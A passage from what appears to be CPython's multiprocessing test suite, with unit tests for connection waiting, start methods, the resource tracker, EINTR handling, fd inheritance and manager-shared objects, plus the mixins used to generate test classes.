        self.assertLess(delta, expected * 2)
        self.assertGreater(delta, expected * 0.5)
        b.send(None)
        # Now `a` is readable: wait() should return almost immediately.
        start = time.monotonic()
        res = wait([a, b], 20)
        delta = time.monotonic() - start
        self.assertEqual(res, [a])
        self.assertLess(delta, 0.4)
    @classmethod
    def signal_and_sleep(cls, sem, period):
        # Child: announce readiness, then stay alive for `period` seconds.
        sem.release()
        time.sleep(period)
    def test_wait_integer(self):
        from multiprocessing.connection import wait
        expected = 3
        sorted_ = lambda l: sorted(l, key=lambda x: id(x))
        sem = multiprocessing.Semaphore(0)
        a, b = multiprocessing.Pipe()
        p = multiprocessing.Process(target=self.signal_and_sleep,
                                    args=(sem, expected))
        p.start()
        # Process sentinels are plain integers and may be passed to wait().
        self.assertIsInstance(p.sentinel, int)
        self.assertTrue(sem.acquire(timeout=20))
        # Only the sentinel becomes ready, once the child exits.
        start = time.monotonic()
        res = wait([a, p.sentinel, b], expected + 20)
        delta = time.monotonic() - start
        self.assertEqual(res, [p.sentinel])
        self.assertLess(delta, expected + 2)
        self.assertGreater(delta, expected - 2)
        a.send(None)
        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start
        self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
        self.assertLess(delta, 0.4)
        b.send(None)
        start = time.monotonic()
        res = wait([a, p.sentinel, b], 20)
        delta = time.monotonic() - start
        self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
        self.assertLess(delta, 0.4)
        p.terminate()
        p.join()
    def test_neg_timeout(self):
        from multiprocessing.connection import wait
        a, b = multiprocessing.Pipe()
        # A negative timeout must behave like zero: return immediately.
        t = time.monotonic()
        res = wait([a], timeout=-1)
        t = time.monotonic() - t
        self.assertEqual(res, [])
        self.assertLess(t, 1)
        a.close()
        b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
    """Issue 14151: Listener must reject an address whose implied family
    does not exist on the current platform."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_family(self):
        # A Windows named-pipe address is invalid on POSIX.
        self.assertRaises(ValueError,
                          multiprocessing.connection.Listener, r'\\.\test')

    @unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
    def test_invalid_family_win32(self):
        # A POSIX socket path is invalid for Windows named pipes.
        self.assertRaises(ValueError,
                          multiprocessing.connection.Listener, '/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
    """Issue 12098: check sys.flags of child matches that of the parent."""
    @classmethod
    def run_in_grandchild(cls, conn):
        # Report this interpreter's flags back up the process chain.
        conn.send(tuple(sys.flags))
    @classmethod
    def run_in_child(cls):
        import json
        r, w = multiprocessing.Pipe(duplex=False)
        p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
        p.start()
        grandchild_flags = r.recv()
        p.join()
        r.close()
        w.close()
        flags = (tuple(sys.flags), grandchild_flags)
        # Printed as JSON so the parent process can parse stdout.
        print(json.dumps(flags))
    def test_flags(self):
        import json
        # start child process using unusual flags
        prog = ('from test._test_multiprocessing import TestFlags; ' +
                'TestFlags.run_in_child()')
        data = subprocess.check_output(
            [sys.executable, '-E', '-S', '-O', '-c', prog])
        child_flags, grandchild_flags = json.loads(data.decode('ascii'))
        self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
    """Issue #6056: test interaction between multiprocessing connections
    and the global socket default timeout."""
    @classmethod
    def _test_timeout(cls, child, address):
        # Child: reply over the pipe after a delay longer than the
        # 0.1s default socket timeout set by the parent, then connect back.
        time.sleep(1)
        child.send(123)
        child.close()
        conn = multiprocessing.connection.Client(address)
        conn.send(456)
        conn.close()
    def test_timeout(self):
        old_timeout = socket.getdefaulttimeout()
        try:
            socket.setdefaulttimeout(0.1)
            parent, child = multiprocessing.Pipe(duplex=True)
            l = multiprocessing.connection.Listener(family='AF_INET')
            p = multiprocessing.Process(target=self._test_timeout,
                                        args=(child, l.address))
            p.start()
            child.close()
            self.assertEqual(parent.recv(), 123)
            parent.close()
            conn = l.accept()
            self.assertEqual(conn.recv(), 456)
            conn.close()
            l.close()
            join_process(p)
        finally:
            # Restore the process-wide default timeout.
            socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
    """Test what happens with no "if __name__ == '__main__'" guard
    (runs the helper script mp_fork_bomb.py)."""
    def test_noforkbomb(self):
        sm = multiprocessing.get_start_method()
        name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
        if sm != 'fork':
            # spawn/forkserver re-import the main module, so the script
            # must fail with RuntimeError instead of bombing.
            rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
            self.assertEqual(out, b'')
            self.assertIn(b'RuntimeError', err)
        else:
            # With fork there is no re-import; the script runs normally.
            rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
            self.assertEqual(out.rstrip(), b'123')
            self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes. Issue #17555 meant that the
    # after fork registry would get duplicate entries for the same
    # lock. The size of the registry at generation n was ~2**n.
    @classmethod
    def child(cls, n, conn):
        # Recurse n generations deep, then report the registry size.
        if n > 1:
            p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
            p.start()
            conn.close()
            join_process(p)
        else:
            conn.send(len(util._afterfork_registry))
            conn.close()
    def test_lock(self):
        r, w = multiprocessing.Pipe(False)
        # Created only for its registration side effect on the registry.
        l = util.ForkAwareThreadLock()
        old_size = len(util._afterfork_registry)
        p = multiprocessing.Process(target=self.child, args=(5, w))
        p.start()
        w.close()
        new_size = r.recv()
        join_process(p)
        # Registry must not grow across generations (no duplicates).
        self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
    """Check that non-forked child processes do not inherit unneeded
    fds/handles."""
    def get_high_socket_fd(self):
        if WIN32:
            # The child process will not have any socket handles, so
            # calling socket.fromfd() should produce WSAENOTSOCK even
            # if there is a handle of the same number.
            return socket.socket().detach()
        else:
            # We want to produce a socket with an fd high enough that a
            # freshly created child process will not have any fds as high.
            fd = socket.socket().detach()
            to_close = []
            while fd < 50:
                to_close.append(fd)
                fd = os.dup(fd)
            for x in to_close:
                os.close(x)
            return fd
    def close(self, fd):
        if WIN32:
            # Adopt the handle into a socket object so closing it
            # releases the underlying Winsock resources.
            socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
        else:
            os.close(fd)
    @classmethod
    def _test_closefds(cls, conn, fd):
        # Child: report the exception (or None) raised by adopting `fd`.
        try:
            s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        except Exception as e:
            conn.send(e)
        else:
            s.close()
            conn.send(None)
    def test_closefd(self):
        if not HAS_REDUCTION:
            raise unittest.SkipTest('requires fd pickling')
        reader, writer = multiprocessing.Pipe()
        fd = self.get_high_socket_fd()
        try:
            p = multiprocessing.Process(target=self._test_closefds,
                                        args=(writer, fd))
            p.start()
            writer.close()
            e = reader.recv()
            join_process(p)
        finally:
            self.close(fd)
            writer.close()
            reader.close()
        if multiprocessing.get_start_method() == 'fork':
            # fork inherits all fds, so adoption must have succeeded.
            self.assertIs(e, None)
        else:
            WSAENOTSOCK = 10038
            self.assertIsInstance(e, OSError)
            self.assertTrue(e.errno == errno.EBADF or
                            e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
    """Issue #17097: EINTR should be ignored by recv(), send(),
    accept() etc."""
    # Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
    CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
    @classmethod
    def _test_ignore(cls, conn):
        def handler(signum, frame):
            pass
        # A no-op handler so SIGUSR1 interrupts syscalls without killing us.
        signal.signal(signal.SIGUSR1, handler)
        conn.send('ready')
        x = conn.recv()
        conn.send(x)
        # Large enough to block in send_bytes() while a signal arrives.
        conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            self.assertEqual(conn.recv(), 'ready')
            time.sleep(0.1)
            # Interrupt the child while it is blocked in recv().
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            conn.send(1234)
            self.assertEqual(conn.recv(), 1234)
            time.sleep(0.1)
            # Interrupt the child while it is blocked in send_bytes().
            os.kill(p.pid, signal.SIGUSR1)
            self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
            time.sleep(0.1)
            p.join()
        finally:
            conn.close()
    @classmethod
    def _test_ignore_listener(cls, conn):
        def handler(signum, frame):
            pass
        signal.signal(signal.SIGUSR1, handler)
        with multiprocessing.connection.Listener() as l:
            conn.send(l.address)
            a = l.accept()
            a.send('welcome')
    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_ignore_listener(self):
        conn, child_conn = multiprocessing.Pipe()
        try:
            p = multiprocessing.Process(target=self._test_ignore_listener,
                                        args=(child_conn,))
            p.daemon = True
            p.start()
            child_conn.close()
            address = conn.recv()
            time.sleep(0.1)
            # Interrupt the child while it is blocked in accept().
            os.kill(p.pid, signal.SIGUSR1)
            time.sleep(0.1)
            client = multiprocessing.connection.Client(address)
            self.assertEqual(client.recv(), 'welcome')
            p.join()
        finally:
            conn.close()
class TestStartMethod(unittest.TestCase):
    """Tests for get/set_start_method() and context objects."""
    @classmethod
    def _check_context(cls, conn):
        # Child: report the start method it was actually started with.
        conn.send(multiprocessing.get_start_method())
    def check_context(self, ctx):
        r, w = ctx.Pipe(duplex=False)
        p = ctx.Process(target=self._check_context, args=(w,))
        p.start()
        w.close()
        child_method = r.recv()
        r.close()
        p.join()
        self.assertEqual(child_method, ctx.get_start_method())
    def test_context(self):
        for method in ('fork', 'spawn', 'forkserver'):
            try:
                ctx = multiprocessing.get_context(method)
            except ValueError:
                # Method not available on this platform.
                continue
            self.assertEqual(ctx.get_start_method(), method)
            self.assertIs(ctx.get_context(), ctx)
            # A concrete context's start method is fixed.
            self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
            self.assertRaises(ValueError, ctx.set_start_method, None)
            self.check_context(ctx)
    def test_set_get(self):
        multiprocessing.set_forkserver_preload(PRELOAD)
        count = 0
        old_method = multiprocessing.get_start_method()
        try:
            for method in ('fork', 'spawn', 'forkserver'):
                try:
                    multiprocessing.set_start_method(method, force=True)
                except ValueError:
                    continue
                self.assertEqual(multiprocessing.get_start_method(), method)
                ctx = multiprocessing.get_context()
                self.assertEqual(ctx.get_start_method(), method)
                self.assertTrue(type(ctx).__name__.lower().startswith(method))
                self.assertTrue(
                    ctx.Process.__name__.lower().startswith(method))
                self.check_context(multiprocessing)
                count += 1
        finally:
            # Restore the process-wide start method.
            multiprocessing.set_start_method(old_method, force=True)
        self.assertGreaterEqual(count, 1)
    def test_get_all(self):
        methods = multiprocessing.get_all_start_methods()
        if sys.platform == 'win32':
            self.assertEqual(methods, ['spawn'])
        else:
            self.assertTrue(methods == ['fork', 'spawn'] or
                            methods == ['spawn', 'fork'] or
                            methods == ['fork', 'spawn', 'forkserver'] or
                            methods == ['spawn', 'fork', 'forkserver'])
    def test_preload_resources(self):
        if multiprocessing.get_start_method() != 'forkserver':
            self.skipTest("test only relevant for 'forkserver' method")
        name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
        rc, out, err = test.support.script_helper.assert_python_ok(name)
        out = out.decode()
        err = err.decode()
        if out.rstrip() != 'ok' or err != '':
            print(out)
            print(err)
            self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
                 "test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
    """Tests for multiprocessing.resource_tracker."""
    def test_resource_tracker(self):
        #
        # Check that killing process does not leak named semaphores
        #
        cmd = '''if 1:
            import time, os, tempfile
            import multiprocessing as mp
            from multiprocessing import resource_tracker
            from multiprocessing.shared_memory import SharedMemory
            mp.set_start_method("spawn")
            rand = tempfile._RandomNameSequence()
            def create_and_register_resource(rtype):
                if rtype == "semaphore":
                    lock = mp.Lock()
                    return lock, lock._semlock.name
                elif rtype == "shared_memory":
                    sm = SharedMemory(create=True, size=10)
                    return sm, sm._name
                else:
                    raise ValueError(
                        "Resource type {{}} not understood".format(rtype))
            resource1, rname1 = create_and_register_resource("{rtype}")
            resource2, rname2 = create_and_register_resource("{rtype}")
            os.write({w}, rname1.encode("ascii") + b"\\n")
            os.write({w}, rname2.encode("ascii") + b"\\n")
            time.sleep(10)
        '''
        for rtype in resource_tracker._CLEANUP_FUNCS:
            with self.subTest(rtype=rtype):
                if rtype == "noop":
                    # Artefact resource type used by the resource_tracker
                    continue
                r, w = os.pipe()
                p = subprocess.Popen([sys.executable,
                                     '-E', '-c', cmd.format(w=w, rtype=rtype)],
                                     pass_fds=[w],
                                     stderr=subprocess.PIPE)
                os.close(w)
                with open(r, 'rb', closefd=True) as f:
                    name1 = f.readline().rstrip().decode('ascii')
                    name2 = f.readline().rstrip().decode('ascii')
                # Unlink the first resource ourselves, then kill the child
                # and check the tracker cleans up the second one.
                _resource_unlink(name1, rtype)
                p.terminate()
                p.wait()
                deadline = time.monotonic() + support.LONG_TIMEOUT
                while time.monotonic() < deadline:
                    time.sleep(.5)
                    try:
                        _resource_unlink(name2, rtype)
                    except OSError as e:
                        # docs say it should be ENOENT, but OSX seems to give
                        # EINVAL
                        self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
                        break
                else:
                    raise AssertionError(
                        f"A {rtype} resource was leaked after a process was "
                        f"abruptly terminated.")
                err = p.stderr.read().decode('utf-8')
                p.stderr.close()
                expected = ('resource_tracker: There appear to be 2 leaked {} '
                            'objects'.format(
                            rtype))
                self.assertRegex(err, expected)
                self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
    def check_resource_tracker_death(self, signum, should_die):
        # bpo-31310: if the semaphore tracker process has died, it should
        # be restarted implicitly.
        from multiprocessing.resource_tracker import _resource_tracker
        pid = _resource_tracker._pid
        if pid is not None:
            # Start from a fresh tracker process.
            os.kill(pid, signal.SIGKILL)
            support.wait_process(pid, exitcode=-signal.SIGKILL)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            _resource_tracker.ensure_running()
        pid = _resource_tracker._pid
        os.kill(pid, signum)
        time.sleep(1.0)  # give it time to die
        ctx = multiprocessing.get_context("spawn")
        with warnings.catch_warnings(record=True) as all_warn:
            warnings.simplefilter("always")
            sem = ctx.Semaphore()
            sem.acquire()
            sem.release()
            wr = weakref.ref(sem)
            # ensure `sem` gets collected, which triggers communication with
            # the semaphore tracker
            del sem
            gc.collect()
            self.assertIsNone(wr())
            if should_die:
                self.assertEqual(len(all_warn), 1)
                the_warn = all_warn[0]
                self.assertTrue(issubclass(the_warn.category, UserWarning))
                self.assertTrue("resource_tracker: process died"
                                in str(the_warn.message))
            else:
                self.assertEqual(len(all_warn), 0)
    def test_resource_tracker_sigint(self):
        # Catchable signal (ignored by semaphore tracker)
        self.check_resource_tracker_death(signal.SIGINT, False)
    def test_resource_tracker_sigterm(self):
        # Catchable signal (ignored by semaphore tracker)
        self.check_resource_tracker_death(signal.SIGTERM, False)
    def test_resource_tracker_sigkill(self):
        # Uncatchable signal.
        self.check_resource_tracker_death(signal.SIGKILL, True)
    @staticmethod
    def _is_resource_tracker_reused(conn, pid):
        from multiprocessing.resource_tracker import _resource_tracker
        _resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
        # context. It should not be a new value.
        reused = _resource_tracker._pid in (None, pid)
        reused &= _resource_tracker._check_alive()
        conn.send(reused)
    def test_resource_tracker_reused(self):
        from multiprocessing.resource_tracker import _resource_tracker
        _resource_tracker.ensure_running()
        pid = _resource_tracker._pid
        r, w = multiprocessing.Pipe(duplex=False)
        p = multiprocessing.Process(target=self._is_resource_tracker_reused,
                                    args=(w, pid))
        p.start()
        is_resource_tracker_reused = r.recv()
        # Clean up
        p.join()
        w.close()
        r.close()
        self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
    """Tests for multiprocessing.SimpleQueue."""
    @classmethod
    def _test_empty(cls, queue, child_can_start, parent_can_continue):
        child_can_start.wait()
        # issue 30301, could fail under spawn and forkserver
        try:
            # Send the child's view of empty() before and after one put().
            queue.put(queue.empty())
            queue.put(queue.empty())
        finally:
            parent_can_continue.set()
    def test_empty(self):
        queue = multiprocessing.SimpleQueue()
        child_can_start = multiprocessing.Event()
        parent_can_continue = multiprocessing.Event()
        proc = multiprocessing.Process(
            target=self._test_empty,
            args=(queue, child_can_start, parent_can_continue)
        )
        proc.daemon = True
        proc.start()
        self.assertTrue(queue.empty())
        child_can_start.set()
        parent_can_continue.wait()
        self.assertFalse(queue.empty())
        # First put() happened on an empty queue, second on a non-empty one.
        self.assertEqual(queue.get(), True)
        self.assertEqual(queue.get(), False)
        self.assertTrue(queue.empty())
        proc.join()
    def test_close(self):
        queue = multiprocessing.SimpleQueue()
        queue.close()
        # closing a queue twice should not fail
        queue.close()
    # Test specific to CPython since it tests private attributes
    @test.support.cpython_only
    def test_closed(self):
        queue = multiprocessing.SimpleQueue()
        queue.close()
        self.assertTrue(queue._reader.closed)
        self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
    def test_release_unused_processes(self):
        # Issue #19675: During pool creation, if we can't create a process,
        # don't leak already created ones.
        will_fail_in = 3
        forked_processes = []
        class FailingForkProcess:
            # Fake Process whose start() fails after `will_fail_in` uses.
            def __init__(self, **kwargs):
                self.name = 'Fake Process'
                self.exitcode = None
                self.state = None
                forked_processes.append(self)
            def start(self):
                nonlocal will_fail_in
                if will_fail_in <= 0:
                    raise OSError("Manually induced OSError")
                will_fail_in -= 1
                self.state = 'started'
            def terminate(self):
                self.state = 'stopping'
            def join(self):
                if self.state == 'stopping':
                    self.state = 'stopped'
            def is_alive(self):
                return self.state == 'started' or self.state == 'stopping'
        with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
            p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
                Process=FailingForkProcess))
            p.close()
            p.join()
        # Every fake process must have been terminated and joined.
        self.assertFalse(
            any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
    """Test all the types which can be shared between a parent and a
    child process by using a manager which acts as an intermediary
    between them.
    In the following unit-tests the base type is created in the parent
    process, the @classmethod represents the worker process and the
    shared object is readable and editable between the two.
    # The child.
    @classmethod
    def _test_list(cls, obj):
        assert obj[0] == 5
        assert obj.append(6)
    # The parent.
    def test_list(self):
        o = self.manager.list()
        o.append(5)
        self.run_worker(self._test_list, o)
        assert o[1] == 6
    """
    manager_class = multiprocessing.managers.SyncManager
    def setUp(self):
        self.manager = self.manager_class()
        self.manager.start()
        self.proc = None
    def tearDown(self):
        # Kill a still-running worker before shutting the manager down.
        if self.proc is not None and self.proc.is_alive():
            self.proc.terminate()
            self.proc.join()
        self.manager.shutdown()
        self.manager = None
        self.proc = None
    @classmethod
    def setUpClass(cls):
        support.reap_children()
    tearDownClass = setUpClass
    def wait_proc_exit(self):
        # Only the manager process should be returned by active_children()
        # but this can take a bit on slow machines, so wait a few seconds
        # if there are other children too (see #17395).
        join_process(self.proc)
        start_time = time.monotonic()
        t = 0.01
        while len(multiprocessing.active_children()) > 1:
            time.sleep(t)
            t *= 2
            dt = time.monotonic() - start_time
            if dt >= 5.0:
                test.support.environment_altered = True
                support.print_warning(f"multiprocessing.Manager still has "
                                      f"{multiprocessing.active_children()} "
                                      f"active children after {dt} seconds")
                break
    def run_worker(self, worker, obj):
        # Run `worker(obj)` in a child process and require a clean exit
        # (any failed assert in the worker yields a non-zero exitcode).
        self.proc = multiprocessing.Process(target=worker, args=(obj, ))
        self.proc.daemon = True
        self.proc.start()
        self.wait_proc_exit()
        self.assertEqual(self.proc.exitcode, 0)
    @classmethod
    def _test_event(cls, obj):
        assert obj.is_set()
        obj.wait()
        obj.clear()
        obj.wait(0.001)
    def test_event(self):
        o = self.manager.Event()
        o.set()
        self.run_worker(self._test_event, o)
        assert not o.is_set()
        o.wait(0.001)
    @classmethod
    def _test_lock(cls, obj):
        obj.acquire()
    def test_lock(self, lname="Lock"):
        o = getattr(self.manager, lname)()
        self.run_worker(self._test_lock, o)
        o.release()
        self.assertRaises(RuntimeError, o.release)  # already released
    @classmethod
    def _test_rlock(cls, obj):
        obj.acquire()
        obj.release()
    def test_rlock(self, lname="RLock"):
        # Bug fix: the default previously read "Lock", so this test never
        # exercised the manager's RLock proxy despite its name.
        o = getattr(self.manager, lname)()
        self.run_worker(self._test_rlock, o)
    @classmethod
    def _test_semaphore(cls, obj):
        obj.acquire()
    def test_semaphore(self, sname="Semaphore"):
        o = getattr(self.manager, sname)()
        self.run_worker(self._test_semaphore, o)
        o.release()
    def test_bounded_semaphore(self):
        self.test_semaphore(sname="BoundedSemaphore")
    @classmethod
    def _test_condition(cls, obj):
        obj.acquire()
        obj.release()
    def test_condition(self):
        o = self.manager.Condition()
        self.run_worker(self._test_condition, o)
    @classmethod
    def _test_barrier(cls, obj):
        assert obj.parties == 5
        obj.reset()
    def test_barrier(self):
        o = self.manager.Barrier(5)
        self.run_worker(self._test_barrier, o)
    @classmethod
    def _test_pool(cls, obj):
        # TODO: fix https://bugs.python.org/issue35919
        with obj:
            pass
    def test_pool(self):
        o = self.manager.Pool(processes=4)
        self.run_worker(self._test_pool, o)
    @classmethod
    def _test_queue(cls, obj):
        assert obj.qsize() == 2
        assert obj.full()
        assert not obj.empty()
        assert obj.get() == 5
        assert not obj.empty()
        assert obj.get() == 6
        assert obj.empty()
    def test_queue(self, qname="Queue"):
        o = getattr(self.manager, qname)(2)
        o.put(5)
        o.put(6)
        self.run_worker(self._test_queue, o)
        assert o.empty()
        assert not o.full()
    def test_joinable_queue(self):
        self.test_queue("JoinableQueue")
    @classmethod
    def _test_list(cls, obj):
        assert obj[0] == 5
        assert obj.count(5) == 1
        assert obj.index(5) == 0
        obj.sort()
        obj.reverse()
        for x in obj:
            pass
        assert len(obj) == 1
        assert obj.pop(0) == 5
    def test_list(self):
        o = self.manager.list()
        o.append(5)
        self.run_worker(self._test_list, o)
        assert not o
        self.assertEqual(len(o), 0)
    @classmethod
    def _test_dict(cls, obj):
        assert len(obj) == 1
        assert obj['foo'] == 5
        assert obj.get('foo') == 5
        assert list(obj.items()) == [('foo', 5)]
        assert list(obj.keys()) == ['foo']
        assert list(obj.values()) == [5]
        assert obj.copy() == {'foo': 5}
        assert obj.popitem() == ('foo', 5)
    def test_dict(self):
        o = self.manager.dict()
        o['foo'] = 5
        self.run_worker(self._test_dict, o)
        assert not o
        self.assertEqual(len(o), 0)
    @classmethod
    def _test_value(cls, obj):
        assert obj.value == 1
        assert obj.get() == 1
        obj.set(2)
    def test_value(self):
        o = self.manager.Value('i', 1)
        self.run_worker(self._test_value, o)
        self.assertEqual(o.value, 2)
        self.assertEqual(o.get(), 2)
    @classmethod
    def _test_array(cls, obj):
        assert obj[0] == 0
        assert obj[1] == 1
        assert len(obj) == 2
        assert list(obj) == [0, 1]
    def test_array(self):
        o = self.manager.Array('i', [0, 1])
        self.run_worker(self._test_array, o)
    @classmethod
    def _test_namespace(cls, obj):
        assert obj.x == 0
        assert obj.y == 1
    def test_namespace(self):
        o = self.manager.Namespace()
        o.x = 0
        o.y = 1
        self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        # Make sure the deliberately-unexported names stay out of __all__.
        excluded = ['SUBDEBUG', 'SUBWARNING']
        support.check__all__(self, multiprocessing,
                             extra=multiprocessing.__all__,
                             blacklist=excluded)
#
# Mixins
#
class BaseMixin(object):
    """Snapshots dangling processes/threads around a test class so that
    tearDownClass can warn about anything the tests leaked."""
    @classmethod
    def setUpClass(cls):
        # Remember what was already dangling before the tests ran.
        cls.dangling = (multiprocessing.process._dangling.copy(),
                        threading._dangling.copy())
    @classmethod
    def tearDownClass(cls):
        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()
        processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
        if processes:
            test.support.environment_altered = True
            support.print_warning(f'Dangling processes: {processes}')
        processes = None
        threads = set(threading._dangling) - set(cls.dangling[1])
        if threads:
            test.support.environment_altered = True
            support.print_warning(f'Dangling threads: {threads}')
        threads = None
class ProcessesMixin(BaseMixin):
    """Mixin exposing the plain process-based multiprocessing API under
    the uniform names used by the generated test classes."""
    TYPE = 'processes'
    Process = multiprocessing.Process
    connection = multiprocessing.connection
    current_process = staticmethod(multiprocessing.current_process)
    parent_process = staticmethod(multiprocessing.parent_process)
    active_children = staticmethod(multiprocessing.active_children)
    Pool = staticmethod(multiprocessing.Pool)
    Pipe = staticmethod(multiprocessing.Pipe)
    Queue = staticmethod(multiprocessing.Queue)
    JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
    Lock = staticmethod(multiprocessing.Lock)
    RLock = staticmethod(multiprocessing.RLock)
    Semaphore = staticmethod(multiprocessing.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.Condition)
    Event = staticmethod(multiprocessing.Event)
    Barrier = staticmethod(multiprocessing.Barrier)
    Value = staticmethod(multiprocessing.Value)
    Array = staticmethod(multiprocessing.Array)
    RawValue = staticmethod(multiprocessing.RawValue)
    RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
    """Mixin that routes the uniform API through a shared Manager.

    The properties use attrgetter('manager.X') so that each access
    resolves self.manager.X at call time (the manager is a class
    attribute created in setUpClass)."""
    TYPE = 'manager'
    Process = multiprocessing.Process
    Queue = property(operator.attrgetter('manager.Queue'))
    JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
    Lock = property(operator.attrgetter('manager.Lock'))
    RLock = property(operator.attrgetter('manager.RLock'))
    Semaphore = property(operator.attrgetter('manager.Semaphore'))
    BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
    Condition = property(operator.attrgetter('manager.Condition'))
    Event = property(operator.attrgetter('manager.Event'))
    Barrier = property(operator.attrgetter('manager.Barrier'))
    Value = property(operator.attrgetter('manager.Value'))
    Array = property(operator.attrgetter('manager.Array'))
    list = property(operator.attrgetter('manager.list'))
    dict = property(operator.attrgetter('manager.dict'))
    Namespace = property(operator.attrgetter('manager.Namespace'))
    @classmethod
    def Pool(cls, *args, **kwds):
        return cls.manager.Pool(*args, **kwds)
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.manager = multiprocessing.Manager()
    @classmethod
    def tearDownClass(cls):
        # only the manager process should be returned by active_children()
        # but this can take a bit on slow machines, so wait a few seconds
        # if there are other children too (see #17395)
        start_time = time.monotonic()
        t = 0.01
        while len(multiprocessing.active_children()) > 1:
            time.sleep(t)
            t *= 2
            dt = time.monotonic() - start_time
            if dt >= 5.0:
                test.support.environment_altered = True
                support.print_warning(f"multiprocessing.Manager still has "
                                      f"{multiprocessing.active_children()} "
                                      f"active children after {dt} seconds")
                break
        gc.collect()  # do garbage collection
        if cls.manager._number_of_objects() != 0:
            # This is not really an error since some tests do not
            # ensure that all processes which hold a reference to a
            # managed object have been joined.
            test.support.environment_altered = True
            support.print_warning('Shared objects which still exist '
                                  'at manager shutdown:')
            support.print_warning(cls.manager._debug_info())
        cls.manager.shutdown()
        cls.manager.join()
        cls.manager = None
        super().tearDownClass()
class ThreadsMixin(BaseMixin):
    # Mixin binding the test API to multiprocessing.dummy, the thread-backed
    # re-implementation of the multiprocessing interface. Pure attribute
    # table: module-level callables are wrapped in staticmethod so attribute
    # access on the class does not turn them into bound methods.
    TYPE = 'threads'
    Process = multiprocessing.dummy.Process
    connection = multiprocessing.dummy.connection
    current_process = staticmethod(multiprocessing.dummy.current_process)
    active_children = staticmethod(multiprocessing.dummy.active_children)
    Pool = staticmethod(multiprocessing.dummy.Pool)
    Pipe = staticmethod(multiprocessing.dummy.Pipe)
    Queue = staticmethod(multiprocessing.dummy.Queue)
    JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
    Lock = staticmethod(multiprocessing.dummy.Lock)
    RLock = staticmethod(multiprocessing.dummy.RLock)
    Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
    BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
    Condition = staticmethod(multiprocessing.dummy.Condition)
    Event = staticmethod(multiprocessing.dummy.Event)
    Barrier = staticmethod(multiprocessing.dummy.Barrier)
    Value = staticmethod(multiprocessing.dummy.Value)
    Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
    """Clone this module's test cases into *remote_globs* for *start_method*.

    For every BaseTestCase subclass, one concrete TestCase per allowed type
    ('processes', 'threads', 'manager') is synthesized by mixing in the
    matching *Mixin class; plain TestCases are copied as-is. Also installs
    setUpModule/tearDownModule hooks that pin the start method and detect
    dangling processes/threads.
    """
    __module__ = remote_globs['__name__']
    local_globs = globals()
    ALL_TYPES = {'processes', 'threads', 'manager'}
